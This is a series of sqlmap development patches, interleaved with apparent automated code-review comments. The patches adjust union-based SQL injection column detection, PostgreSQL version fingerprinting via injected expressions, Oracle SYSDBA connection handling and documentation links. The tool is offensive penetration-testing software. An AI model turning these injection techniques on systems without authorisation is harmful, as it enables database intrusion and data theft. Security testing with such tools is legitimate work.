VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/sqlmap.py b/sqlmap.py
index 4593e715b42..4d1a16a4359 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -264,8 +264,8 @@ def main():
raise SystemExit
elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")):
- errMsg = "please update the 'sqlalchemy' package "
- errMsg += "(Reference: https://github.com/apache/incubator-superset/issues/3447)"
+ errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) "
+ errMsg += "(Reference: https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe)"
logger.error(errMsg)
raise SystemExit
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b275a378482..e04494dc465 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8fc5eef70dd6099c61c26c48767c4ef5 lib/core/settings.py +2b1dd381a11c70766d31a272619dc356 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -225,7 +225,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -e585626909b2de432f1fb71e0944b130 sqlmap.py +5c8583dd47f92935ceb41210a10eeebf sqlmap.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py From 3544793961fff7c4169cfe8857bf9c972a5fcec2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 7 May 2018 10:48:35 +0200 Subject: [PATCH 130/428] Fixes #3088 --- lib/core/settings.py | 2 +- lib/techniques/union/test.py | 10 ++++++++-- txt/checksum.md5 | 4 ++-- 3 files changed, 11 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e85af5f8bf7..c28cf1fa7fc 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS
# sqlmap version (...)
-VERSION = "1.2.5.5"
+VERSION = "1.2.5.6"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py
index 0ca8f656937..e04248de12d 100644
--- a/lib/techniques/union/test.py
+++ b/lib/techniques/union/test.py
@@ -90,8 +90,8 @@ def _orderByTest(cols):
kb.errorIsNone = False
lowerCount, upperCount = conf.uColsStart, conf.uColsStop
- if lowerCount == 1 or conf.uCols:
- found = kb.orderByColumns or (_orderByTechnique(lowerCount, upperCount) if conf.uCols else _orderByTechnique())
+ if kb.orderByColumns is None and (lowerCount == 1 or conf.uCols): # ORDER BY is not bullet-proof
+ found = _orderByTechnique(lowerCount, upperCount) if conf.uCols else _orderByTechnique()
if found: kb.orderByColumns = found
infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "")
@@ -267,6 +267,8 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
validPayload = None
vector = None
+ orderBy = kb.orderByColumns
+ uChars = (conf.uChar, kb.uChar)
# In case that user explicitly stated number of columns affected
if conf.uColsStop == conf.uColsStart:
@@ -301,6 +303,10 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
if not all((validPayload, vector)) and not warnMsg.endswith("consider "):
singleTimeWarnMessage(warnMsg)
+ if count and orderBy is None and kb.orderByColumns is not None: # discard ORDER BY results (not usable - e.g. maybe invalid altogether)
+ conf.uChar, kb.uChar = uChars
+ validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
+
return validPayload, vector
def unionTest(comment, place, parameter, value, prefix, suffix):
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index e04494dc465..713b23f21d0 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-2b1dd381a11c70766d31a272619dc356 lib/core/settings.py
+051375e24f79fe7967a7401d57e084cf lib/core/settings.py
0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
6306284edcccc185b2df085438572b0d lib/core/target.py
@@ -97,7 +97,7 @@ bad83c6386adf345fbc982bdafbe3b93 lib/techniques/dns/use.py
f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py
1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py
1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py
-2075952d327723169de8fb7ac667c9c1 lib/techniques/union/test.py
+94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py
11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py
8d99c07416df40350ff8836d9d79ebb5 lib/utils/api.py
37dfb641358669f62c2acedff241348b lib/utils/brute.py
From 9a63fb105597bc6979635fd21b3787c207aae3ac Mon Sep 17 00:00:00 2001
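Review bot: The added comment says the ORDER BY result is discarded before the retry, but none of the new lines resets `kb.orderByColumns`; the recursive `_unionTestByCharBruteforce` call therefore starts with `orderBy` already non-None (which is also the only thing preventing a second recursion), and unless something between the hunks clears it, the retry likely runs with the very column hint it was meant to drop. If a genuine re-test is intended, clear it alongside the restore, `conf.uChar, kb.uChar = uChars` followed by `kb.orderByColumns = None`, and then stop the recursion explicitly, for example with a `retry=False` keyword parameter checked in the condition, rather than relying on the stale value as the guard. `count` is assigned above the hunk, so what a truthy `count` means at this point is not visible here. `_unionTestByCharBruteforce` starts before this hunk; the `return` is its last statement.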
From: Miroslav Stampar
Date: Tue, 8 May 2018 11:59:56 +0200
Subject: [PATCH 131/428] Trivial refactoring
---
lib/core/settings.py | 2 +-
lib/techniques/error/use.py | 4 ++--
txt/checksum.md5 | 4 ++--
3 files changed, 5 insertions(+), 5 deletions(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index c28cf1fa7fc..b5c9b911861 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
# sqlmap version (...)
-VERSION = "1.2.5.6"
+VERSION = "1.2.5.7"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index cf84aa71347..495fac78a22 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -414,7 +414,7 @@ def errorThread():
break
if output and isListLike(output) and len(output) == 1:
- output = output[0]
+ output = unArrayizeValue(output)
with kb.locks.value: index = None
@@ -446,7 +446,7 @@ def errorThread():
value = _errorFields(expression, expressionFields, expressionFieldsList)
if value and isListLike(value) and len(value) == 1 and isinstance(value[0], basestring):
- value = value[0]
+ value = unArrayizeValue(value)
duration = calculateDeltaSeconds(start)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 713b23f21d0..a882f575370 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-051375e24f79fe7967a7401d57e084cf lib/core/settings.py
+a71c8f980be88d8e953631e387a97b96 lib/core/settings.py
0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
6306284edcccc185b2df085438572b0d lib/core/target.py
@@ -94,7 +94,7 @@ f1decf0a987bd3a4bc757212cbe6a6c8 lib/takeover/xp_cmdshell.py
799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py
bad83c6386adf345fbc982bdafbe3b93 lib/techniques/dns/use.py
1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py
-f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py
+f5fb02487edaf9adaa81d54324c84f8f lib/techniques/error/use.py
1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py
1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py
94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py
From 13bf3e649a4bd5d82fe84893d3bf33be4caeefd9 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Tue, 8 May 2018 12:09:24 +0200
Subject: [PATCH 132/428] Trivial refactoring
---
lib/core/common.py | 12 +++---------
lib/core/settings.py | 2 +-
txt/checksum.md5 | 4 ++--
3 files changed, 6 insertions(+), 12 deletions(-)
diff --git a/lib/core/common.py b/lib/core/common.py
index e877dde5052..86d6c17c194 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2156,7 +2156,7 @@ def initCommonOutputs():
if line not in kb.commonOutputs[key]: kb.commonOutputs[key].add(line)
-def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, unique=False):
+def getFileItems(filename, commentPrefix='#', unicoded=True, lowercase=False, unique=False):
""" Returns newline delimited items contained inside file """
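Review bot: Renaming the keyword parameter `unicode_` to `unicoded` changes the public signature of `getFileItems`, so any caller (or third-party script) that passes `unicode_=False` by keyword now fails with `TypeError: unexpected keyword argument`; if the old name has to go, keep it accepted for a release, for example by adding `**kwargs` and mapping `unicoded = kwargs.get("unicode_", unicoded)` with a deprecation warning. The docstring should also say what the flag selects, since nothing in the signature tells a reader that it switches between the codec-aware `openFile(...)` and a plain byte-oriented `open(...)`, per the body in the next hunk. The function body continues past this hunk.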
@@ -2169,20 +2169,14 @@ def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, un
checkFile(filename)
try:
- with openFile(filename, 'r', errors="ignore") if unicode_ else open(filename, 'r') as f:
- for line in (f.readlines() if unicode_ else f.xreadlines()): # xreadlines doesn't return unicode strings when codec.open() is used
+ with openFile(filename, 'r', errors="ignore") if unicoded else open(filename, 'r') as f:
+ for line in (f.readlines() if unicoded else f.xreadlines()): # xreadlines doesn't return unicode strings when codec.open() is used
if commentPrefix:
if line.find(commentPrefix) != -1: line = line[:line.find(commentPrefix)]
line = line.strip()
- if not unicode_:
- try:
- line = str.encode(line)
- except UnicodeDecodeError:
- continue
if line:
if lowercase: line = line.lower()
diff --git a/lib/core/settings.py b/lib/core/settings.py
index b5c9b911861..0c6fe119319 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
# sqlmap version (...)
-VERSION = "1.2.5.7"
+VERSION = "1.2.5.8"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index a882f575370..c6b2556675a 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
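Review bot: Dropping the `str.encode(line)` / `except UnicodeDecodeError: continue` block changes what the non-unicoded path yields: that call implicitly decodes a byte string as ASCII on Python 2 (which is why the removed handler caught `UnicodeDecodeError`), so lines with non-ASCII bytes used to be skipped and are now returned as raw byte strings. That may well be the intended fix, but it is not a "trivial refactoring" for callers such as wordlist readers that later mix these items with unicode, so it deserves a note on the `open(filename, 'r')` branch, e.g. `# byte-oriented mode: non-ASCII lines are passed through unchanged, caller must cope with raw bytes`, and a check of the `unicoded=False` call sites. The `xreadlines` trailing comment is now the only explanation left for the two branches, so a docstring line for `unicoded` would help too. `getFileItems` starts before this hunk and continues after it.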
@@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -f42e346d33199b4f663cff6efe2be775 lib/core/common.py +2e81c8be79eb98227affcfd7bd25c702 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a71c8f980be88d8e953631e387a97b96 lib/core/settings.py +f49b5204228e41b1cfab5ba231272f09 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From 4a8f01c9dc77c1c17d7e4da53d6294a071868c0c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 8 May 2018 14:06:34 +0200 Subject: [PATCH 133/428] Minor updates --- lib/core/settings.py | 2 +- lib/request/rangehandler.py | 2 +- plugins/dbms/db2/connector.py | 6 +++--- plugins/dbms/informix/connector.py | 6 +++--- plugins/dbms/mssqlserver/connector.py | 6 +++--- plugins/dbms/mssqlserver/fingerprint.py | 4 ++-- plugins/dbms/mssqlserver/takeover.py | 4 ++-- plugins/dbms/oracle/connector.py | 8 ++++---- plugins/dbms/postgresql/fingerprint.py | 10 +++++++--- txt/checksum.md5 | 18 +++++++++--------- 10 files changed, 35 insertions(+), 31 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 0c6fe119319..362c85b1ccf 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.8" +VERSION = "1.2.5.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/rangehandler.py b/lib/request/rangehandler.py index 47d703ce127..6c7e33ffa8d 100644 --- a/lib/request/rangehandler.py +++ b/lib/request/rangehandler.py @@ -32,7 +32,7 @@ class HTTPRangeHandler(urllib2.BaseHandler): urllib2.install_opener(opener) # create Request and set Range header - req = urllib2.Request('http://www.python.org/') + req = urllib2.Request('https://www.python.org/') req.header['Range'] = 'bytes=30-50' f = urllib2.urlopen(req) """ diff --git a/plugins/dbms/db2/connector.py b/plugins/dbms/db2/connector.py index 7bd4b86d420..dcb2b5fca5b 100644 --- a/plugins/dbms/db2/connector.py +++ b/plugins/dbms/db2/connector.py @@ -19,9 +19,9 @@ class Connector(GenericConnector): """ - Homepage: http://code.google.com/p/ibm-db/ - User guide: http://code.google.com/p/ibm-db/wiki/README - API: http://www.python.org/dev/peps/pep-0249/ + Homepage: https://github.com/ibmdb/python-ibmdb + User guide: https://github.com/ibmdb/python-ibmdb/wiki/README + API: https://www.python.org/dev/peps/pep-0249/ License: Apache License 2.0 """ diff --git a/plugins/dbms/informix/connector.py b/plugins/dbms/informix/connector.py index d4c5354ea42..e85de013fc5 100644 --- a/plugins/dbms/informix/connector.py +++ b/plugins/dbms/informix/connector.py 
@@ -19,9 +19,9 @@ class Connector(GenericConnector): """ - Homepage: http://code.google.com/p/ibm-db/ - User guide: http://code.google.com/p/ibm-db/wiki/README - API: http://www.python.org/dev/peps/pep-0249/ + Homepage: https://github.com/ibmdb/python-ibmdb + User guide: https://github.com/ibmdb/python-ibmdb/wiki/README + API: https://www.python.org/dev/peps/pep-0249/ License: Apache License 2.0 """ diff --git a/plugins/dbms/mssqlserver/connector.py b/plugins/dbms/mssqlserver/connector.py index 36f69ef3227..997a69cd040 100644 --- a/plugins/dbms/mssqlserver/connector.py +++ b/plugins/dbms/mssqlserver/connector.py @@ -21,9 +21,9 @@ class Connector(GenericConnector): """ - Homepage: http://pymssql.sourceforge.net/ - User guide: http://pymssql.sourceforge.net/examples_pymssql.php - API: http://pymssql.sourceforge.net/ref_pymssql.php + Homepage: http://www.pymssql.org/en/stable/ + User guide: http://www.pymssql.org/en/stable/pymssql_examples.html + API: http://www.pymssql.org/en/stable/ref/pymssql.html Debian package: python-pymssql License: LGPL diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py index 354b05b4807..f5a5af27ea8 100644 --- a/plugins/dbms/mssqlserver/fingerprint.py +++ b/plugins/dbms/mssqlserver/fingerprint.py @@ -136,8 +136,8 @@ def checkDbmsOs(self, detailed=False): self.createSupportTbl(self.fileTblName, self.tblField, "varchar(1000)") inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "@@VERSION")) - # Reference: http://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions - # http://en.wikipedia.org/wiki/Windows_NT#Releases + # Reference: https://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions + # https://en.wikipedia.org/wiki/Windows_NT#Releases versions = { "NT": ("4.0", (6, 5, 4, 3, 2, 1)), "2000": ("5.0", (4, 3, 2, 1)), diff --git a/plugins/dbms/mssqlserver/takeover.py b/plugins/dbms/mssqlserver/takeover.py index a728a74da9b..8d15b478fbf 100644 
--- a/plugins/dbms/mssqlserver/takeover.py
+++ b/plugins/dbms/mssqlserver/takeover.py
@@ -26,8 +26,8 @@ def uncPathRequest(self):
def spHeapOverflow(self):
""" References:
- * http://www.microsoft.com/technet/security/bulletin/MS09-004.mspx
- * http://support.microsoft.com/kb/959420
+ * https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-004
+ * https://support.microsoft.com/en-us/help/959420/ms09-004-vulnerabilities-in-microsoft-sql-server-could-allow-remote-co
"""
returns = {
diff --git a/plugins/dbms/oracle/connector.py b/plugins/dbms/oracle/connector.py
index fc8946ada07..4f31e73089b 100644
--- a/plugins/dbms/oracle/connector.py
+++ b/plugins/dbms/oracle/connector.py
@@ -24,10 +24,10 @@ class Connector(GenericConnector):
"""
- Homepage: http://cx-oracle.sourceforge.net/
- User guide: http://cx-oracle.sourceforge.net/README.txt
- API: http://cx-oracle.sourceforge.net/html/index.html
- License: http://cx-oracle.sourceforge.net/LICENSE.txt
+ Homepage: https://oracle.github.io/python-cx_Oracle/
+ User https://cx-oracle.readthedocs.io/en/latest/
+ API: https://wiki.python.org/moin/DatabaseProgramming
+ License: https://cx-oracle.readthedocs.io/en/latest/license.html#license
"""
def __init__(self):
diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py
index 61c0d6efd1b..a9a50633f94 100644
--- a/plugins/dbms/postgresql/fingerprint.py
+++ b/plugins/dbms/postgresql/fingerprint.py
@@ -60,7 +60,7 @@ def checkDbms(self):
""" References for fingerprint:
- * http://www.postgresql.org/docs/9.1/interactive/release.html (up to 9.1.3)
+ * https://www.postgresql.org/docs/current/static/release.html
"""
if not conf.extensiveFp and Backend.isDbmsWithin(PGSQL_ALIASES):
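Review bot: The rewritten cx_Oracle docstring drops the `guide:` label, so the second line now reads `User https://cx-oracle.readthedocs.io/en/latest/` while the db2, informix and mssqlserver connectors touched in this same commit keep the `User guide: <url>` form; it should be `User guide: https://cx-oracle.readthedocs.io/en/latest/`. The `API:` entry now points at the generic Python wiki page on database programming instead of a cx_Oracle API reference; if the intent is the DB-API specification, `https://www.python.org/dev/peps/pep-0249/` would match what the db2 and informix connectors use. This hunk is documentation only; the `Connector` class continues outside it.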
@@ -97,8 +97,12 @@ def checkDbms(self):
infoMsg = "actively fingerprinting %s" % DBMS.PGSQL
logger.info(infoMsg)
- if inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"):
- Backend.setVersion(">= 9.5.0")
+ if inject.checkBooleanExpression("XMLTABLE(NULL) IS NULL"):
+ Backend.setVersion(">= 10.0")
+ elif inject.checkBooleanExpression("SIND(0)=0"):
+ Backend.setVersion(">= 9.6.0", "< 10.0")
+ elif inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"):
+ Backend.setVersion(">= 9.5.0", "< 9.6.0")
elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"):
Backend.setVersionList([">= 9.4.0", "< 9.5.0"])
elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"):
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index c6b2556675a..94e15d08bec 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-f49b5204228e41b1cfab5ba231272f09 lib/core/settings.py
+0134616235193faba40a094cf7a4ba09 lib/core/settings.py
0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
6306284edcccc185b2df085438572b0d lib/core/target.py
@@ -77,7 +77,7 @@ eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py
b188a11542a996276abbbc48913501c3 lib/request/inject.py
aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py
51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py
-aa7cb67139bbc57d67a728fd2abf80ed lib/request/rangehandler.py
+2c3774b72586985719035b195f144d7b lib/request/rangehandler.py
aa809d825b33bea76a63ecd97cf7792c lib/request/redirecthandler.py
7f12d8f3b6665ed7053954bba70ff718 lib/request/templates.py
747f9941a68361bd779ec760f71568e9 lib/takeover/abstraction.py
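Review bot: The two new `elif` branches call `Backend.setVersion(">= 9.6.0", "< 10.0")` and `Backend.setVersion(">= 9.5.0", "< 9.6.0")` with two positional arguments, whereas the untouched branch directly below expresses the same kind of bounded range as `Backend.setVersionList([">= 9.4.0", "< 9.5.0"])`; if `setVersion` takes a single version string, as that sibling suggests, these calls raise `TypeError` the first time a 9.5 or 9.6 backend is fingerprinted, so they should read `Backend.setVersionList([">= 9.6.0", "< 10.0"])` and `Backend.setVersionList([">= 9.5.0", "< 9.6.0"])`. Separately, I would confirm against a real PostgreSQL 10 that `XMLTABLE(NULL) IS NULL` parses as a boolean expression at all, since `XMLTABLE` is a table-valued construct that expects a `PASSING` clause; if it is a syntax error there, the `>= 10.0` branch is unreachable and every 10.x server falls through to the `SIND(0)=0` branch and is reported as 9.6. `checkDbms` starts before this hunk and continues past it.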
@@ -124,7 +124,7 @@ c2428c5c73d049abf4442ec1b9404a25 plugins/dbms/access/fingerprint.py e657b1b7a295a38ac9ce515158164f00 plugins/dbms/access/__init__.py 77686d7c7e287d5db0a9a87f2c7d4902 plugins/dbms/access/syntax.py 2f1d8706b51497623b2b59c07b552bdc plugins/dbms/access/takeover.py -ead470b613e52e718a3062b63b518272 plugins/dbms/db2/connector.py +8df07c2805aceb7d6fb4add40de84795 plugins/dbms/db2/connector.py 4deeda463003ab71e7d2f34a263b5bbf plugins/dbms/db2/enumeration.py da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/db2/filesystem.py b54dbf44590a5cbefb2b4f8e9a01a383 plugins/dbms/db2/fingerprint.py @@ -145,7 +145,7 @@ b7d693a6f5f39fee0a65f2d7b0830c5e plugins/dbms/hsqldb/fingerprint.py fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py 7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py -9ceb9430031a26ecebe13ea49cb2a5fa plugins/dbms/informix/connector.py +97dac442190bd4ffac3ba292e2abfd4c plugins/dbms/informix/connector.py c54d70e4847c6327bd3110c4d8723b04 plugins/dbms/informix/enumeration.py da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/informix/filesystem.py 35eac2f3837a72940eb50753dc4566e5 plugins/dbms/informix/fingerprint.py 
@@ -160,13 +160,13 @@ ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py 4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py e7d44671ae26c0bcd5fe8448be070bbd plugins/dbms/maxdb/syntax.py bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py -9e64e67291a4c369bad8b8cf2cfa722a plugins/dbms/mssqlserver/connector.py +decc645344bb93aca504a71ba2e4cad4 plugins/dbms/mssqlserver/connector.py f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py 177e1d55d28ed3190bc0079b8126c6be plugins/dbms/mssqlserver/filesystem.py -51eb413ac62408965be20a812f2412c8 plugins/dbms/mssqlserver/fingerprint.py +08914da79141713bd69a25c3cc7f06a8 plugins/dbms/mssqlserver/fingerprint.py f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py 612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py -08fe8ac7acdfc0e3168b5b069a7c73bf plugins/dbms/mssqlserver/takeover.py +3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py f6e1f3f09f32b9cb2ca11c016d373423 plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py 4578fa29f04d0a75499f9668466ded07 plugins/dbms/mysql/filesystem.py @@ -174,7 +174,7 @@ fcbf7ff279c527b4aca0dac94c28d20c plugins/dbms/mysql/fingerprint.py 30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py 403591e638b6bfdb840d52bd3138ee56 plugins/dbms/mysql/takeover.py -999cb8d0d52820d30bdd4b3d658a765d plugins/dbms/oracle/connector.py +f772070dba85976a7894dac5046b93ea plugins/dbms/oracle/connector.py e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py e16cbf8abda91a906ca7bafb81d8866e plugins/dbms/oracle/fingerprint.py 
@@ -184,7 +184,7 @@ bcdbd9c04d7d5a911e0e31abe1a24f0f plugins/dbms/oracle/takeover.py
 f99c23db4ee6a6b8c0edbf684d360ad3 plugins/dbms/postgresql/connector.py
 7cdb821884e5f15084d1bea7f8a50574 plugins/dbms/postgresql/enumeration.py
 c8bb829d45752b98e6a03817b92e0fe5 plugins/dbms/postgresql/filesystem.py
-603d533d924498378eccba4f0f196be6 plugins/dbms/postgresql/fingerprint.py
+29560cf78211888802c6e5c8681e7d71 plugins/dbms/postgresql/fingerprint.py
 470860d3e85d11a67f2220bffaa415e7 plugins/dbms/postgresql/__init__.py
 20e6f48f496348be45f3402ebc265dbb plugins/dbms/postgresql/syntax.py
 1287acf330da86a93c8e64aff46e3b65 plugins/dbms/postgresql/takeover.py
From 7b3a17bfe73a80ba05f2086ff1ab025d5c5e6403 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Wed, 9 May 2018 13:38:39 +0200
Subject: [PATCH 134/428] Patch for #3068
---
 lib/core/common.py      | 4 ++++
 lib/core/settings.py    | 2 +-
 lib/utils/sqlalchemy.py | 2 +-
 txt/checksum.md5        | 6 +++---
 4 files changed, 9 insertions(+), 5 deletions(-)
diff --git a/lib/core/common.py b/lib/core/common.py
index 86d6c17c194..dd504674269 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1387,6 +1387,10 @@ def parseTargetDirect():
                 __import__("psycopg2")
             elif dbmsName == DBMS.ORACLE:
                 __import__("cx_Oracle")
+
+                # Reference: http://itsiti.com/ora-28009-connection-sys-sysdba-sysoper
+                if (conf.dbmsUser or "").upper() == "SYS":
+                    conf.direct = "%s?mode=SYSDBA" % conf.direct
             elif dbmsName == DBMS.SQLITE:
                 __import__("sqlite3")
             elif dbmsName == DBMS.ACCESS:
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 362c85b1ccf..7f8161fcee0 100644
--- a/lib/core/settings.py
